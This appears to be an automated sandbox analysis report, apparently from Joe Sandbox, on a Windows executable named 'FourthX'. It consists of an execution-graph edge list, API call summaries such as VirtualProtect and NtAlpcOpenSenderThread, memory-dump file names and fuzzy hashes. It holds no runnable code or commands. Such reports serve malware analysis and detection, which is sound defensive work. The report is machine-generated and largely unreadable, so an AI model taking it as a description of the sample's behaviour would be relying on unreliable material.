3462->3463 3464 7ff69a5315d5 3463->3464 3465 7ff69a531394 2 API calls 3464->3465 3466 7ff69a5315e4 3465->3466 3467 7ff69a531394 2 API calls 3466->3467 3468 7ff69a5315f3 3467->3468 3468->2880 3470 7ff69a531394 2 API calls 3469->3470 3471 7ff69a5315f3 3470->3471 3471->2886 3473 7ff69a531394 2 API calls 3472->3473 3474 7ff69a5315b7 3473->3474 3475 7ff69a531394 2 API calls 3474->3475 3476 7ff69a5315c1 3475->3476 3477 7ff69a531394 2 API calls 3476->3477 3478 7ff69a5315c6 3477->3478 3479 7ff69a531394 2 API calls 3478->3479 3480 7ff69a5315d5 3479->3480 3481 7ff69a531394 2 API calls 3480->3481 3482 7ff69a5315e4 3481->3482 3483 7ff69a531394 2 API calls 3482->3483 3484 7ff69a5315f3 3483->3484 3484->2893 3484->2894 3486 7ff69a531394 2 API calls 3485->3486 3487 7ff69a53153a 3486->3487 3488 7ff69a53153f 3487->3488 3489 7ff69a531394 2 API calls 3487->3489 3490 7ff69a531394 2 API calls 3488->3490 3489->3488 3491 7ff69a53154e 3490->3491 3492 7ff69a531394 2 API calls 3491->3492 3493 7ff69a531558 3492->3493 3494 7ff69a53155d 3493->3494 3495 7ff69a531394 2 API calls 3493->3495 3496 7ff69a531394 2 API calls 3494->3496 3495->3494 3497 7ff69a531567 3496->3497 3498 7ff69a53156c 3497->3498 3499 7ff69a531394 2 API calls 3497->3499 3500 7ff69a531394 2 API calls 3498->3500 3499->3498 3501 7ff69a531576 3500->3501 3502 7ff69a53157b 3501->3502 3503 7ff69a531394 2 API calls 3501->3503 3504 7ff69a531394 2 API calls 3502->3504 3503->3502 3505 7ff69a531585 3504->3505 3506 7ff69a53158a 3505->3506 3507 7ff69a531394 2 API calls 3505->3507 3508 7ff69a531394 2 API calls 3506->3508 3507->3506 3509 7ff69a531599 3508->3509 3510 7ff69a531394 2 API calls 3509->3510 3511 7ff69a5315a3 3510->3511 3512 7ff69a5315a8 3511->3512 3513 7ff69a531394 2 API calls 3511->3513 3514 7ff69a531394 2 API calls 3512->3514 3513->3512 3515 7ff69a5315b7 3514->3515 3516 7ff69a531394 2 API calls 3515->3516 3517 7ff69a5315c1 3516->3517 3518 7ff69a531394 2 API calls 3517->3518 3519 7ff69a5315c6 3518->3519 3520 7ff69a531394 2 API calls 
3519->3520 3521 7ff69a5315d5 3520->3521 3522 7ff69a531394 2 API calls 3521->3522 3523 7ff69a5315e4 3522->3523 3524 7ff69a531394 2 API calls 3523->3524 3525 7ff69a5315f3 3524->3525 3525->2918 3525->2919 3527 7ff69a531394 2 API calls 3526->3527 3528 7ff69a5314b3 3527->3528 3529 7ff69a531394 2 API calls 3528->3529 3530 7ff69a5314b8 3529->3530 3531 7ff69a531394 2 API calls 3530->3531 3532 7ff69a5314c7 3531->3532 3533 7ff69a531394 2 API calls 3532->3533 3534 7ff69a5314d6 3533->3534 3535 7ff69a531394 2 API calls 3534->3535 3536 7ff69a5314e5 3535->3536 3537 7ff69a531394 2 API calls 3536->3537 3538 7ff69a5314f4 3537->3538 3539 7ff69a531394 2 API calls 3538->3539 3540 7ff69a531503 3539->3540 3541 7ff69a531394 2 API calls 3540->3541 3542 7ff69a531512 3541->3542 3543 7ff69a531394 2 API calls 3542->3543 3544 7ff69a531521 3543->3544 3545 7ff69a531530 3544->3545 3546 7ff69a531394 2 API calls 3544->3546 3547 7ff69a531394 2 API calls 3545->3547 3546->3545 3548 7ff69a53153a 3547->3548 3549 7ff69a53153f 3548->3549 3550 7ff69a531394 2 API calls 3548->3550 3551 7ff69a531394 2 API calls 3549->3551 3550->3549 3552 7ff69a53154e 3551->3552 3553 7ff69a531394 2 API calls 3552->3553 3554 7ff69a531558 3553->3554 3555 7ff69a53155d 3554->3555 3556 7ff69a531394 2 API calls 3554->3556 3557 7ff69a531394 2 API calls 3555->3557 3556->3555 3558 7ff69a531567 3557->3558 3559 7ff69a53156c 3558->3559 3560 7ff69a531394 2 API calls 3558->3560 3561 7ff69a531394 2 API calls 3559->3561 3560->3559 3562 7ff69a531576 3561->3562 3563 7ff69a53157b 3562->3563 3564 7ff69a531394 2 API calls 3562->3564 3565 7ff69a531394 2 API calls 3563->3565 3564->3563 3566 7ff69a531585 3565->3566 3567 7ff69a53158a 3566->3567 3568 7ff69a531394 2 API calls 3566->3568 3569 7ff69a531394 2 API calls 3567->3569 3568->3567 3570 7ff69a531599 3569->3570 3571 7ff69a531394 2 API calls 3570->3571 3572 7ff69a5315a3 3571->3572 3573 7ff69a5315a8 3572->3573 3574 7ff69a531394 2 API calls 3572->3574 3575 7ff69a531394 2 API calls 3573->3575 3574->3573 
3576 7ff69a5315b7 3575->3576 3577 7ff69a531394 2 API calls 3576->3577 3578 7ff69a5315c1 3577->3578 3579 7ff69a531394 2 API calls 3578->3579 3580 7ff69a5315c6 3579->3580 3581 7ff69a531394 2 API calls 3580->3581 3582 7ff69a5315d5 3581->3582 3583 7ff69a531394 2 API calls 3582->3583 3584 7ff69a5315e4 3583->3584 3585 7ff69a531394 2 API calls 3584->3585 3586 7ff69a5315f3 3585->3586 3586->2926 3587 7ff69a531440 3586->3587 3588 7ff69a531394 2 API calls 3587->3588 3589 7ff69a53144f 3588->3589 3590 7ff69a531394 2 API calls 3589->3590 3591 7ff69a531459 3590->3591 3592 7ff69a53145e 3591->3592 3593 7ff69a531394 2 API calls 3591->3593 3594 7ff69a531394 2 API calls 3592->3594 3593->3592 3595 7ff69a531468 3594->3595 3596 7ff69a53146d 3595->3596 3597 7ff69a531394 2 API calls 3595->3597 3598 7ff69a531394 2 API calls 3596->3598 3597->3596 3599 7ff69a531477 3598->3599 3600 7ff69a53147c 3599->3600 3601 7ff69a531394 2 API calls 3599->3601 3602 7ff69a531394 2 API calls 3600->3602 3601->3600 3603 7ff69a531486 3602->3603 3604 7ff69a53148b 3603->3604 3605 7ff69a531394 2 API calls 3603->3605 3606 7ff69a531394 2 API calls 3604->3606 3605->3604 3607 7ff69a531495 3606->3607 3608 7ff69a53149a 3607->3608 3609 7ff69a531394 2 API calls 3607->3609 3610 7ff69a531394 2 API calls 3608->3610 3609->3608 3611 7ff69a5314a4 3610->3611 3612 7ff69a5314a9 3611->3612 3613 7ff69a531394 2 API calls 3611->3613 3614 7ff69a531394 2 API calls 3612->3614 3613->3612 3615 7ff69a5314b3 3614->3615 3616 7ff69a531394 2 API calls 3615->3616 3617 7ff69a5314b8 3616->3617 3618 7ff69a531394 2 API calls 3617->3618 3619 7ff69a5314c7 3618->3619 3620 7ff69a531394 2 API calls 3619->3620 3621 7ff69a5314d6 3620->3621 3622 7ff69a531394 2 API calls 3621->3622 3623 7ff69a5314e5 3622->3623 3624 7ff69a531394 2 API calls 3623->3624 3625 7ff69a5314f4 3624->3625 3626 7ff69a531394 2 API calls 3625->3626 3627 7ff69a531503 3626->3627 3628 7ff69a531394 2 API calls 3627->3628 3629 7ff69a531512 3628->3629 3630 7ff69a531394 2 API calls 3629->3630 
3631 7ff69a531521 3630->3631 3632 7ff69a531530 3631->3632 3633 7ff69a531394 2 API calls 3631->3633 3634 7ff69a531394 2 API calls 3632->3634 3633->3632 3635 7ff69a53153a 3634->3635 3636 7ff69a53153f 3635->3636 3637 7ff69a531394 2 API calls 3635->3637 3638 7ff69a531394 2 API calls 3636->3638 3637->3636 3639 7ff69a53154e 3638->3639 3640 7ff69a531394 2 API calls 3639->3640 3641 7ff69a531558 3640->3641 3642 7ff69a53155d 3641->3642 3643 7ff69a531394 2 API calls 3641->3643 3644 7ff69a531394 2 API calls 3642->3644 3643->3642 3645 7ff69a531567 3644->3645 3646 7ff69a53156c 3645->3646 3647 7ff69a531394 2 API calls 3645->3647 3648 7ff69a531394 2 API calls 3646->3648 3647->3646 3649 7ff69a531576 3648->3649 3650 7ff69a53157b 3649->3650 3651 7ff69a531394 2 API calls 3649->3651 3652 7ff69a531394 2 API calls 3650->3652 3651->3650 3653 7ff69a531585 3652->3653 3654 7ff69a53158a 3653->3654 3655 7ff69a531394 2 API calls 3653->3655 3656 7ff69a531394 2 API calls 3654->3656 3655->3654 3657 7ff69a531599 3656->3657 3658 7ff69a531394 2 API calls 3657->3658 3659 7ff69a5315a3 3658->3659 3660 7ff69a5315a8 3659->3660 3661 7ff69a531394 2 API calls 3659->3661 3662 7ff69a531394 2 API calls 3660->3662 3661->3660 3663 7ff69a5315b7 3662->3663 3664 7ff69a531394 2 API calls 3663->3664 3665 7ff69a5315c1 3664->3665 3666 7ff69a531394 2 API calls 3665->3666 3667 7ff69a5315c6 3666->3667 3668 7ff69a531394 2 API calls 3667->3668 3669 7ff69a5315d5 3668->3669 3670 7ff69a531394 2 API calls 3669->3670 3671 7ff69a5315e4 3670->3671 3672 7ff69a531394 2 API calls 3671->3672 3673 7ff69a5315f3 3672->3673 3673->2926 3673->2938 3675 7ff69a5335c1 memset 3674->3675 3685 7ff69a5333c3 3674->3685 3676 7ff69a5335e6 3675->3676 3678 7ff69a53362b wcscpy wcscat wcslen 3676->3678 3677 7ff69a53343a memset 3677->3685 3679 7ff69a531422 2 API calls 3678->3679 3681 7ff69a533728 3679->3681 3680 7ff69a533493 wcscpy wcscat wcslen 3993 7ff69a531422 3680->3993 3683 7ff69a533767 3681->3683 4088 7ff69a531431 3681->4088 3690 7ff69a5314c7 
3683->3690 3685->3675 3685->3677 3685->3680 3687 7ff69a53145e 2 API calls 3685->3687 3689 7ff69a533579 3685->3689 3687->3685 3688 7ff69a53145e 2 API calls 3688->3683 3689->3675 3691 7ff69a531394 2 API calls 3690->3691 3692 7ff69a5314d6 3691->3692 3693 7ff69a531394 2 API calls 3692->3693 3694 7ff69a5314e5 3693->3694 3695 7ff69a531394 2 API calls 3694->3695 3696 7ff69a5314f4 3695->3696 3697 7ff69a531394 2 API calls 3696->3697 3698 7ff69a531503 3697->3698 3699 7ff69a531394 2 API calls 3698->3699 3700 7ff69a531512 3699->3700 3701 7ff69a531394 2 API calls 3700->3701 3702 7ff69a531521 3701->3702 3703 7ff69a531530 3702->3703 3704 7ff69a531394 2 API calls 3702->3704 3705 7ff69a531394 2 API calls 3703->3705 3704->3703 3706 7ff69a53153a 3705->3706 3707 7ff69a53153f 3706->3707 3708 7ff69a531394 2 API calls 3706->3708 3709 7ff69a531394 2 API calls 3707->3709 3708->3707 3710 7ff69a53154e 3709->3710 3711 7ff69a531394 2 API calls 3710->3711 3712 7ff69a531558 3711->3712 3713 7ff69a53155d 3712->3713 3714 7ff69a531394 2 API calls 3712->3714 3715 7ff69a531394 2 API calls 3713->3715 3714->3713 3716 7ff69a531567 3715->3716 3717 7ff69a53156c 3716->3717 3718 7ff69a531394 2 API calls 3716->3718 3719 7ff69a531394 2 API calls 3717->3719 3718->3717 3720 7ff69a531576 3719->3720 3721 7ff69a53157b 3720->3721 3722 7ff69a531394 2 API calls 3720->3722 3723 7ff69a531394 2 API calls 3721->3723 3722->3721 3724 7ff69a531585 3723->3724 3725 7ff69a53158a 3724->3725 3726 7ff69a531394 2 API calls 3724->3726 3727 7ff69a531394 2 API calls 3725->3727 3726->3725 3728 7ff69a531599 3727->3728 3729 7ff69a531394 2 API calls 3728->3729 3730 7ff69a5315a3 3729->3730 3731 7ff69a5315a8 3730->3731 3732 7ff69a531394 2 API calls 3730->3732 3733 7ff69a531394 2 API calls 3731->3733 3732->3731 3734 7ff69a5315b7 3733->3734 3735 7ff69a531394 2 API calls 3734->3735 3736 7ff69a5315c1 3735->3736 3737 7ff69a531394 2 API calls 3736->3737 3738 7ff69a5315c6 3737->3738 3739 7ff69a531394 2 API calls 3738->3739 3740 7ff69a5315d5 
3739->3740 3741 7ff69a531394 2 API calls 3740->3741 3742 7ff69a5315e4 3741->3742 3743 7ff69a531394 2 API calls 3742->3743 3744 7ff69a5315f3 3743->3744 3744->2954 3746 7ff69a532f88 3745->3746 3747 7ff69a5314a9 2 API calls 3746->3747 3748 7ff69a532fd0 3747->3748 3748->2928 3750 7ff69a532690 10 API calls 3749->3750 3751 7ff69a53391e 3750->3751 3752 7ff69a5314a9 2 API calls 3751->3752 3771 7ff69a533b21 3751->3771 3753 7ff69a533967 3752->3753 3754 7ff69a533b28 3753->3754 4179 7ff69a5314b8 3753->4179 4448 7ff69a5315c6 3754->4448 3757 7ff69a533a87 memset 4241 7ff69a53148b 3757->4241 3760 7ff69a5314b8 2 API calls 3761 7ff69a53398f 3760->3761 3761->3757 3761->3760 4236 7ff69a5315d5 3761->4236 3765 7ff69a5314b8 2 API calls 3766 7ff69a533b07 3765->3766 3766->3754 3767 7ff69a533b0b 3766->3767 4375 7ff69a53147c 3767->4375 3770 7ff69a53145e 2 API calls 3770->3771 3771->2939 3776 7ff69a537760 3772->3776 3774 7ff69a5313b8 3775 7ff69a5313c6 NtAlpcOpenSenderThread 3774->3775 3775->2996 3777 7ff69a53777e 3776->3777 3780 7ff69a5377ab 3776->3780 3777->3774 3778 7ff69a537853 3779 7ff69a53786f malloc 3778->3779 3781 7ff69a537890 3779->3781 3780->3777 3780->3778 3781->3777 3783 7ff69a53266f memset 3782->3783 3783->3191 3862 7ff69a53155d 3784->3862 3786 7ff69a5327f4 3787 7ff69a5314c7 2 API calls 3786->3787 3790 7ff69a532816 3787->3790 3789 7ff69a532785 wcsncmp 3893 7ff69a5314e5 3789->3893 3792 7ff69a531503 2 API calls 3790->3792 3793 7ff69a53283d 3792->3793 3795 7ff69a532847 memset 3793->3795 3794 7ff69a532d27 3797 7ff69a532877 3795->3797 3796 7ff69a5328bc wcscpy wcscat wcslen 3798 7ff69a53291a 3796->3798 3799 7ff69a5328ee wcslen 3796->3799 3797->3796 3800 7ff69a532967 wcslen 3798->3800 3802 7ff69a532985 3798->3802 3799->3798 3800->3802 3801 7ff69a5329d9 wcslen 3803 7ff69a5314a9 2 API calls 3801->3803 3802->3794 3802->3801 3804 7ff69a532a73 3803->3804 3805 7ff69a5314a9 2 API calls 3804->3805 3806 7ff69a532bd2 3805->3806 3944 7ff69a5314f4 3806->3944 3809 7ff69a5314c7 2 API calls 3810 
[Control-flow graph edge list: numbered graph nodes labelled with code addresses in the 7ff69a531000-7ff69a537cf0 range and their "N API calls" summaries; the rendered graph itself is not recoverable. API names appearing on graph nodes: strlen, __set_app_type, __setusermatherr, fprintf, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, TlsGetValue, GetLastError, free, malloc, signal, VirtualProtect, NtAlpcOpenSenderThread.]

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2643109117-0
                                                                                            • Opcode ID: 2b53ccf195520873a2e917af6671c9f2e66b4ccc906881f89422d3245024f0a5
                                                                                            • Instruction ID: 27bce8ce139899e3fbcfb9e7a52058f18e861de07bc588bd195729ec89287832
                                                                                            • Opcode Fuzzy Hash: 2b53ccf195520873a2e917af6671c9f2e66b4ccc906881f89422d3245024f0a5
                                                                                            • Instruction Fuzzy Hash: 5F512665F09646C1FA309B26E9913B937E0FFCA780F4095F1DA8DC73A6DE2CA4958310

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • NtAlpcOpenSenderThread.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69A531156), ref: 00007FF69A5313F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: AlpcOpenSenderThread
                                                                                            • String ID:
                                                                                            • API String ID: 2815344548-0
                                                                                            • Opcode ID: 12f7f34e5646d7a47c6394ab71dba81ff32d213577a609a8212d1207fc3fc457
                                                                                            • Instruction ID: 66b6a56c93f3288bf36e84f578cfcee90f744e511c8f4ef10120472394a9de03
                                                                                            • Opcode Fuzzy Hash: 12f7f34e5646d7a47c6394ab71dba81ff32d213577a609a8212d1207fc3fc457
                                                                                            • Instruction Fuzzy Hash: 60F07975A08B41CAD620EF51F95156A77A1FB9A780B0058B5EACC83725EF3EE1508B40

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            • Associated: 00000004.00000002.1436783304.00007FF69A530000.00000002.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1436826482.00007FF69A538000.00000002.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1436844817.00007FF69A53A000.00000004.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1436862676.00007FF69A53B000.00000008.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1437120032.00007FF69A7B7000.00000004.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1437185303.00007FF69A7B9000.00000002.00000001.01000000.00000008.sdmp
                                                                                            • Associated: 00000004.00000002.1437225245.00007FF69A7BC000.00000002.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ff69a530000_FourthX.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscatwcscpywcslen
                                                                                            • String ID: $0$0$@$@
                                                                                            • API String ID: 4263182637-1413854666
                                                                                            • Opcode ID: c0374e99f57159db9168dd41bd58a6aa1b632868761db697d436deb027a0c17b
                                                                                            • Instruction ID: f24beb74553e7515e0b511090bdbb5391b16c554aff283be0b115e1980f3d171
                                                                                            • Opcode Fuzzy Hash: c0374e99f57159db9168dd41bd58a6aa1b632868761db697d436deb027a0c17b
                                                                                            • Instruction Fuzzy Hash: 48B17C61A0CAC695E331CF28E4163BA77E0FFD5348F4012B5EAC8966A5DF7CE1858B44

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                                            • String ID: 0$X$`
                                                                                            • API String ID: 329590056-2527496196
                                                                                            • Opcode ID: 048c2398568d0800d11cdb0fb5f1a267ba7517e309314ff7a549fe036a4ef88d
                                                                                            • Instruction ID: 48eb1ef39b9561a82ac5daa5da909e00144c3faea41d84117eb8c95f729af973
                                                                                            • Opcode Fuzzy Hash: 048c2398568d0800d11cdb0fb5f1a267ba7517e309314ff7a549fe036a4ef88d
                                                                                            • Instruction Fuzzy Hash: 59028862A09BC691E7708F19E8013AA77A0FB967A4F4043B5DADC877A5DF3CD185C700

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • VirtualQuery.KERNEL32(?,?,?,?,00007FF69A5393AC,00007FF69A5393AC,?,?,00007FF69A530000,?,00007FF69A531991), ref: 00007FF69A531C63
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,00007FF69A5393AC,00007FF69A5393AC,?,?,00007FF69A530000,?,00007FF69A531991), ref: 00007FF69A531CC7
                                                                                            • memcpy.MSVCRT ref: 00007FF69A531CE0
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00007FF69A5393AC,00007FF69A5393AC,?,?,00007FF69A530000,?,00007FF69A531991), ref: 00007FF69A531D23
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                            • API String ID: 2595394609-2123141913
                                                                                            • Opcode ID: cb1764b4d40c7b3cd8d53eb81bd19f74b1d4bb87b7ad2fc799354775426d0bf5
                                                                                            • Instruction ID: 936dc1ac31dd1d72ccd6f728fe2a8f0f2c96fe4a33b2c6f95d740c1509243585
                                                                                            • Opcode Fuzzy Hash: cb1764b4d40c7b3cd8d53eb81bd19f74b1d4bb87b7ad2fc799354775426d0bf5
                                                                                            • Instruction Fuzzy Hash: 0B416B61B09A46D5EE318B21E8446B837E0FB86BD4F5445F2DA8DC77A5DE3CE585C300

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                            • String ID:
                                                                                            • API String ID: 3326252324-0
                                                                                            • Opcode ID: 369838192b3f6a9457ac0e282590e13b5ac60ae82803ec82e43dce6996ba929d
                                                                                            • Instruction ID: e937c9c1ed9718ddbcafcab35454499aa16924c2c1bd6441c7b460cd0cae7ae3
                                                                                            • Opcode Fuzzy Hash: 369838192b3f6a9457ac0e282590e13b5ac60ae82803ec82e43dce6996ba929d
                                                                                            • Instruction Fuzzy Hash: 88211D64F0AA02D1FAB58F01E95037832E0FF92B91F4441F0D99DCB6A4DF2CA856C300

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CCG
                                                                                            • API String ID: 0-1584390748
                                                                                            • Opcode ID: 88f5887b5313669d61e74955578d1318dfdb425a374c820e70499acdf5c62993
                                                                                            • Instruction ID: 68dc0b8fc1a103ebec670638cf0e0f9a378b6514b6380d9caa9f96fb0f24444e
                                                                                            • Opcode Fuzzy Hash: 88f5887b5313669d61e74955578d1318dfdb425a374c820e70499acdf5c62993
                                                                                            • Instruction Fuzzy Hash: 33213925F09106C2FE79562495903BD35C1EFCA7A4F2586F5DA9DC72D8DF2CA882C250

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69A531247), ref: 00007FF69A5319F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                            • API String ID: 544645111-395989641
                                                                                            • Opcode ID: 93bdf84029d068f56074ddd8b9ba6012cff20265fe349589ca7ebf28d2f061c0
                                                                                            • Instruction ID: aca4f6efb5fb722d6bb26be9bce3f117772422d5fa2dc261b4998a717cbcc4ab
                                                                                            • Opcode Fuzzy Hash: 93bdf84029d068f56074ddd8b9ba6012cff20265fe349589ca7ebf28d2f061c0
                                                                                            • Instruction Fuzzy Hash: 52518CA6F08546D6EB248B21E8417B837E1FB96BA5F4441F1D99DC7798CE3CE482C700

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: fprintf
                                                                                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                            • API String ID: 383729395-3474627141
                                                                                            • Opcode ID: 734c1bc93119674d019ef67c840bcff02c3ba548de9bf7d395623722429a4793
                                                                                            • Instruction ID: bece9b8ca8804c2d7c8925431e878fa94c323fb41193b8c37aa6644d0e4deb20
                                                                                            • Opcode Fuzzy Hash: 734c1bc93119674d019ef67c840bcff02c3ba548de9bf7d395623722429a4793
                                                                                            • Instruction Fuzzy Hash: BAF06211F18A45C2E6719B64A9410BDB3A0FB9A7C1F5092B1EF8ED7655DF2CF182C300

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1436804977.00007FF69A531000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF69A530000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                            • String ID:
                                                                                            • API String ID: 682475483-0
                                                                                            • Opcode ID: 844f6d217ff74ff32d443163d169c904dbc537589d089fe909406bc73ab79a72
                                                                                            • Instruction ID: 38821839cf20a7fd568428543fc41f356ba00b882f7b8f6504be8e72e265c3aa
                                                                                            • Opcode Fuzzy Hash: 844f6d217ff74ff32d443163d169c904dbc537589d089fe909406bc73ab79a72
                                                                                            • Instruction Fuzzy Hash: A2012C65B0EA02C2F6B58F01EE5427832E0FF96BD1F4441F1CA9DD76A4DF2CA895C200

                                                                                            Execution Graph

                                                                                            Execution Coverage:3.7%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:1710
                                                                                            Total number of Limit Nodes:2
7ff7ee4a5218 wcscpy wcscat wcslen 2927 7ff7ee4a146d 2 API calls 2923->2927 2924->2923 2925->2909 2926 7ff7ee4a5639 wcslen 2928 7ff7ee4a153f 2 API calls 2926->2928 2929 7ff7ee4a52e5 2927->2929 2930 7ff7ee4a56c4 2928->2930 3497 7ff7ee4a1530 2929->3497 2932 7ff7ee4a145e 2 API calls 2930->2932 2935 7ff7ee4a56d6 2932->2935 2933->2926 2945 7ff7ee4a576e 2935->2945 3761 7ff7ee4a2f70 2935->3761 2936 7ff7ee4a68b3 2939 7ff7ee4a145e 2 API calls 2936->2939 2937 7ff7ee4a5323 3536 7ff7ee4a14a9 2937->3536 2942 7ff7ee4a68bf 2939->2942 2940 7ff7ee4a57cb wcslen 2944 7ff7ee4a57e1 2940->2944 2962 7ff7ee4a581c 2940->2962 2942->2815 2949 7ff7ee4a57f0 _wcsnicmp 2944->2949 2945->2940 2946 7ff7ee4a53bf 2948 7ff7ee4a145e 2 API calls 2946->2948 2947 7ff7ee4a5704 3765 7ff7ee4a38e0 2947->3765 2952 7ff7ee4a53b3 2948->2952 2953 7ff7ee4a5806 wcslen 2949->2953 2949->2962 3686 7ff7ee4a3350 memset 2952->3686 2953->2949 2953->2962 2956 7ff7ee4a5987 memset wcscpy wcscat 2961 7ff7ee4a2f70 2 API calls 2956->2961 2957 7ff7ee4a53a7 2963 7ff7ee4a145e 2 API calls 2957->2963 2958 7ff7ee4a14c7 2 API calls 2959 7ff7ee4a5760 2958->2959 2959->2945 2966 7ff7ee4a145e 2 API calls 2959->2966 2965 7ff7ee4a59de 2961->2965 2962->2956 2963->2952 2968 7ff7ee4a3350 11 API calls 2965->2968 2966->2945 2969 7ff7ee4a59f6 2968->2969 2970 7ff7ee4a14c7 2 API calls 2969->2970 2971 7ff7ee4a5a24 memset 2970->2971 2974 7ff7ee4a5a45 2971->2974 2972 7ff7ee4a540e 2973 7ff7ee4a2df0 11 API calls 2972->2973 2981 7ff7ee4a5497 2973->2981 2975 7ff7ee4a5a95 wcslen 2974->2975 2976 7ff7ee4a5aa7 2975->2976 2977 7ff7ee4a5ae7 wcscat memset 2975->2977 2978 7ff7ee4a5ac0 _wcsnicmp 2976->2978 2983 7ff7ee4a5b22 2977->2983 2978->2977 2980 7ff7ee4a5ad2 wcslen 2978->2980 2980->2977 2980->2978 2982 7ff7ee4a2df0 11 API calls 2981->2982 2982->2840 2984 